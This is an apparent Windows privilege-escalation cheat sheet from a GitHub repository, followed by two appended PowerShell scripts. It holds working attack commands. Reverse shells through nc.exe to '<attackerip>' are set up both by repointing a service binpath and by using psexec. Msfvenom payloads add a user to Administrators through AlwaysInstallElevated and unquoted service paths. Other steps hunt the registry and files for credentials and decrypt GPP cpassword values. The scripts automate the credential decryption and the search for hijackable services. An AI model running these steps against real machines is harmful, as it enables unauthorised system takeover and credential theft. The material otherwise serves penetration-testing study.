https://github.com/wwong99/windows-privilege-escalation
Windows Enumeration

# basics
systeminfo
hostname
echo %username%

# users
net user
net user <username>

# network
ipconfig /all
route print
arp -a
netstat -ano        # active network connections with the owning PID

# firewall status (the "netsh firewall" context is the legacy one; "advfirewall" is current)
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall show rule all

# save the systeminfo output to a file and compare it against the patch database for missing fixes
# https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py
python windows-exploit-suggester.py -d 2017-05-27-mssb.xls -i systeminfo.txt

# search the installed hotfixes for specific KBs
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."
--------------------------------------
Kernel
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
# look for a kernel exploit matching the build, find a writable place to upload it (eg: C:\Inetpub or C:\temp), run the exe
--------------------------------------
Weak permissions
# this example is for XP SP0
# upload accesschk.exe to a writable directory first
# for XP, version 5.2 of accesschk.exe is needed
# https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe
# list services whose configuration "Authenticated Users" can change
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
# inspect the services found above
accesschk.exe -ucqv upnphost
# upload nc.exe to a writable directory, then point the service binary at it
# (sc needs the space after "binpath=", "obj=", "password=" and "start=")
sc config upnphost binpath= "C:\Inetpub\nc.exe -nv <attackerip> 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
# check the status now
sc qc upnphost
# upnphost depends on SSDPSRV: set it to AUTO-START and start it first
sc config SSDPSRV start= auto
# start the services
net start SSDPSRV
net stop upnphost
net start upnphost
# listen on port 9988 and you'll get a shell with NT AUTHORITY\SYSTEM privileges
# nc.exe is not a real service binary, so the SCM kills it when the start timeout (about 30 s) expires: act quickly or spawn a second process from the shell
--------------------------------------
Registry Checks for Passwords
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"    # DefaultUserName / DefaultPassword (autologon)
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"                   # SNMP community strings
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"                      # saved PuTTY sessions (proxy credentials)
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
--------------------------------------
Places to Check for Credentials
C:\sysprep.inf
C:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
dir /b /s unattend.xml
dir /b /s web.config
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s *pass*
dir /b /s vnc.ini
# in unattend.xml, a <Value> whose <PlainText> is false is base64 of the UTF-16 password with the element name appended (e.g. "...AdministratorPassword"); decode it before trying it
----------------------------
Groups.xml
# Look up the IP address of the DC
nslookup nameofserver.whatever.local
# It will output something like this
Address: 192.168.1.101
# Now we mount SYSVOL (readable by every domain user)
net use z: \\192.168.1.101\SYSVOL
# And enter it
z:
# Now we search for the groups.xml file (the same cpassword attribute can appear in Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml and Printers.xml)
dir Groups.xml /s
# decrypt the cpassword attribute value; the AES key is published by Microsoft, so any domain user can do this
gpp-decrypt <cpassword>
-----------------------------
AlwaysInstallElevated
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
# Exploitable only when "AlwaysInstallElevated" is 1 (REG_DWORD 0x1) in BOTH hives; one of them alone is not enough.
# Exploitation:
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f msi-nouac -o setup.msi
# Place 'setup.msi' in 'C:\Temp'
msiexec /quiet /qn /i C:\Temp\setup.msi
net localgroup Administrators
---------------------------------
Find writable files
dir /a-r-d /s /b
# /a selects by attribute: -r excludes read-only files, -d excludes directories (files only)
# /s recurses subdirectories
# /b bare format: path and filename only
# Caveat: the read-only attribute is not an ACL. A file without it can still be unwritable for your account; confirm with icacls <file> before relying on it.
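The credential stores above are found with dir and decoded by hand (gpp-decrypt, a base64 decode). The following PowerShell script is an added example, not code from the original repository: it walks a directory tree, decrypts the cpassword attribute in Groups.xml with the AES-256 key Microsoft published for Group Policy Preferences, and decodes AdministratorPassword/Password values in unattend.xml. Because no real SYSVOL or Panther folder is available offline, the script constructs its own sample files under %TEMP% (the user names and passwords in them are made up), which is also why it carries an encryption helper that a real hunt would never need.

```powershell
# Added example (not from the original repository): finds Groups.xml and
# unattend.xml files under a directory tree and decodes the passwords they
# hold. Sample files are constructed below so the script runs offline.

# AES-256 key Microsoft published for GPP "cpassword" values (MS-GPPREF 2.2.1.1.4)
$GppKey = [byte[]](0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                   0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)

function New-GppCipher {
    # GPP uses AES-256-CBC with an all-zero IV and PKCS7 padding
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Key     = $GppKey
    $aes.IV      = New-Object byte[] 16
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    return $aes
}

function ConvertFrom-GppPassword([string]$CPassword) {
    # Groups.xml strips the base64 '=' padding; restore it before decoding
    $b64 = $CPassword.Trim()
    while ($b64.Length % 4 -ne 0) { $b64 += '=' }
    $cipher = [Convert]::FromBase64String($b64)
    $plain  = (New-GppCipher).CreateDecryptor().TransformFinalBlock($cipher, 0, $cipher.Length)
    return [System.Text.Encoding]::Unicode.GetString($plain)
}

function ConvertTo-GppPassword([string]$Password) {
    # Only needed to build the constructed sample; a real Groups.xml already carries the ciphertext
    $bytes  = [System.Text.Encoding]::Unicode.GetBytes($Password)
    $cipher = (New-GppCipher).CreateEncryptor().TransformFinalBlock($bytes, 0, $bytes.Length)
    return [Convert]::ToBase64String($cipher).TrimEnd('=')
}

function ConvertFrom-UnattendPassword($Node) {
    # <Value> is plain text when <PlainText> is true; otherwise it is
    # base64(UTF-16LE(password + element name)), e.g. "...AdministratorPassword"
    $value = $Node.SelectSingleNode('*[local-name()="Value"]').InnerText
    $pt    = $Node.SelectSingleNode('*[local-name()="PlainText"]')
    if ($null -eq $pt -or $pt.InnerText -eq 'true') { return $value }   # assumption: no <PlainText> means plain text
    $s = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($value))
    if ($s.EndsWith($Node.LocalName)) { $s = $s.Substring(0, $s.Length - $Node.LocalName.Length) }
    return $s
}

function Find-StoredCredentials([string]$Root) {
    $found = @()
    foreach ($f in Get-ChildItem -Path $Root -Recurse -File -Include 'Groups.xml','Unattend*.xml') {
        [xml]$x = Get-Content -LiteralPath $f.FullName -Raw
        if ($f.Name -ieq 'Groups.xml') {
            foreach ($p in $x.SelectNodes('//Properties[@cpassword]')) {
                $found += [pscustomobject]@{ File = $f.FullName; User = $p.GetAttribute('userName')
                                             Password = (ConvertFrom-GppPassword ($p.GetAttribute('cpassword'))) }
            }
        } else {
            # unattend.xml sits in a default namespace, hence local-name() instead of plain element names
            foreach ($n in $x.SelectNodes('//*[local-name()="AdministratorPassword" or local-name()="Password"]')) {
                $found += [pscustomobject]@{ File = $f.FullName; User = $n.LocalName
                                             Password = (ConvertFrom-UnattendPassword $n) }
            }
        }
    }
    return $found
}

# --- constructed sample tree standing in for SYSVOL and %WINDIR%\Panther (made-up accounts and passwords) ---
$root = Join-Path ([IO.Path]::GetTempPath()) ("credhunt-" + [guid]::NewGuid().ToString('N'))
New-Item -ItemType Directory -Path "$root\SYSVOL\Policies\Groups", "$root\Panther" | Out-Null

$cp = ConvertTo-GppPassword 'Local*P4ssword!'
@"
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="backupadmin">
    <Properties action="U" cpassword="$cp" userName="backupadmin" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"/>
  </User>
</Groups>
"@ | Set-Content -LiteralPath "$root\SYSVOL\Policies\Groups\Groups.xml"

$b64 = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('Winter2024!' + 'AdministratorPassword'))
@"
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <UserAccounts>
        <AdministratorPassword><Value>$b64</Value><PlainText>false</PlainText></AdministratorPassword>
      </UserAccounts>
      <AutoLogon>
        <Username>Administrator</Username>
        <Password><Value>Winter2024!</Value><PlainText>true</PlainText></Password>
      </AutoLogon>
    </component>
  </settings>
</unattend>
"@ | Set-Content -LiteralPath "$root\Panther\Unattend.xml"

Find-StoredCredentials $root | Format-Table -AutoSize
Remove-Item -LiteralPath $root -Recurse -Force
```

On a real target, point Find-StoredCredentials at the mapped SYSVOL drive (z:\ after the net use above) or at %WINDIR%\Panther and drop the sample-building part. The output lists backupadmin / Local*P4ssword! from the GPP file and both Winter2024! values from the unattend file; any failure to decode a cpassword usually means the value was copied with whitespace or line breaks, which the Trim() does not cover.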
-----------------------------------
Unquoted Path
# auto-start services outside C:\Windows whose image path is not quoted
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
# Suppose we found: C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe
# Windows tries each prefix that ends at a space, with .exe appended, in this order:
#   C:\Program.exe
#   C:\Program Files (x86)\Program.exe
#   C:\Program Files (x86)\Program Folder\A.exe
# so the file you drop must carry exactly one of those names, in a folder you can write to
# check the permissions of the folders along the path
icacls "C:\Program Files (x86)\Program Folder"
# exploit: build a proper service binary (exe-service answers the SCM; a plain exe is killed after the start timeout)
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
# Place common.exe in 'C:\Program Files\Unquoted Path Service' (e.g. when the service image lives under
# 'C:\Program Files\Unquoted Path Service\Common Files\', so the name Windows tries first in that folder is Common.exe).
# Open a command prompt and restart the service (or reboot if you cannot stop/start it):
sc start unquotedsrvc
net localgroup Administrators
-----------------------------------
# psexec using found credentials
# first upload nc.exe to a writable directory
psexec.exe -u <username> -p <password> \\MACHINENAME C:\Inetpub\nc.exe <attackerip> <attackerport> -e C:\windows\system32\cmd.exe
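The "Weak permissions" section above leans on accesschk.exe and the "Unquoted Path" section on wmic plus a manual icacls per folder. The following PowerShell script is an added example, not code from the original repository: it reads each service's security descriptor with sc sdshow and flags ACEs that give a low-privileged trustee the rights needed to repoint the service (SERVICE_CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER, or the generic write/all bits), then enumerates unquoted auto-start image paths, derives every hijack candidate the loader would try, and probes whether the current account can write to the candidate's folder. The trustee list (AU, BU, WD, IU, BG) is an assumption about which groups a low-privileged account belongs to; ACEs granted to explicit SIDs are not resolved. The writability probe creates and immediately deletes an empty file, so it does leave a trace in file-system auditing.

```powershell
# Added example (not from the original repository): the "weak permissions" and
# "unquoted path" checks above without accesschk or wmic. Read-only except for
# the writability probe, which creates and deletes an empty file.

# Trustees a low-privileged user normally belongs to (SDDL short names, assumed list):
# AU Authenticated Users, BU Users, WD Everyone, IU Interactive, BG Guests
$LowPrivTrustees = 'AU','BU','WD','IU','BG'
# Rights that let the holder repoint or re-own a service:
# DC SERVICE_CHANGE_CONFIG, WD WRITE_DAC, WO WRITE_OWNER, GA GENERIC_ALL, GW GENERIC_WRITE
$HijackRightTokens = 'DC','WD','WO','GA','GW'
$HijackRightMask   = 0x2 -bor 0x40000 -bor 0x80000 -bor 0x10000000 -bor 0x40000000

function Get-WeakServiceAces([string]$Name) {
    # "sc sdshow" prints the service's security descriptor in SDDL
    $sddl = (& sc.exe sdshow $Name 2>$null | Where-Object { $_ -match '^D:' }) -join ''
    if (-not $sddl) { return @() }
    $weak = @()
    # ACE = (type;flags;rights;object;inherit_object;trustee), e.g. (A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)
    foreach ($m in [regex]::Matches($sddl, '\(A;[^;]*;([^;]*);[^;]*;[^;]*;([^)]*)\)')) {
        $rights  = $m.Groups[1].Value
        $trustee = $m.Groups[2].Value
        if ($LowPrivTrustees -notcontains $trustee) { continue }
        if ($rights -like '0x*') {
            # rights given as a numeric access mask
            $hit = if ([Convert]::ToUInt32($rights.Substring(2), 16) -band $HijackRightMask) { $rights } else { $null }
        } else {
            # rights given as two-letter tokens
            $tokens = [regex]::Matches($rights, '..') | ForEach-Object { $_.Value }
            $hit = ($tokens | Where-Object { $HijackRightTokens -contains $_ }) -join ','
        }
        if ($hit) { $weak += [pscustomobject]@{ Service = $Name; Trustee = $trustee; Rights = $hit } }
    }
    return $weak
}

function Test-DirectoryWritable([string]$Dir) {
    # probe by creating and deleting an empty file (an ACL walk would have to resolve every group the token holds)
    $probe = Join-Path $Dir ([IO.Path]::GetRandomFileName())
    try { [IO.File]::WriteAllText($probe, ''); Remove-Item -LiteralPath $probe -Force; return $true }
    catch { return $false }
}

function Get-UnquotedPathHijacks {
    $out = @()
    $services = Get-CimInstance Win32_Service | Where-Object {
        $_.StartMode -eq 'Auto' -and $_.PathName -and $_.PathName -notlike '"*' -and $_.PathName -notlike 'C:\Windows\*'
    }
    foreach ($s in $services) {
        # the image path ends at the first ".exe"; anything after it is arguments
        $image = [regex]::Match($s.PathName, '^.*?\.exe', 'IgnoreCase').Value
        if (-not $image -or $image -notmatch ' ') { continue }
        $parts = $image -split ' '
        # CreateProcess tries each space-delimited prefix with ".exe" appended, shortest first
        for ($i = 1; $i -lt $parts.Count; $i++) {
            $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
            $dir = Split-Path -Path $candidate -Parent
            if (-not (Test-Path -LiteralPath $dir -PathType Container)) { continue }
            $out += [pscustomobject]@{
                Service   = $s.Name
                Candidate = $candidate
                Writable  = Test-DirectoryWritable $dir
            }
        }
    }
    return $out
}

"== services a low-privileged trustee can reconfigure =="
Get-CimInstance Win32_Service | ForEach-Object { Get-WeakServiceAces $_.Name } | Format-Table -AutoSize
"== unquoted auto-start image paths; Writable=True means the hijack file can be dropped there =="
Get-UnquotedPathHijacks | Format-Table -AutoSize
```

A service reported by the first check is exploited exactly as in the upnphost walkthrough (sc config ... binpath=), and a Writable=True candidate from the second is exploited as in the unquoted-path walkthrough, with the payload renamed to the Candidate filename. Both checks only establish that the configuration is weak; whether the service actually runs as LocalSystem is still read from sc qc.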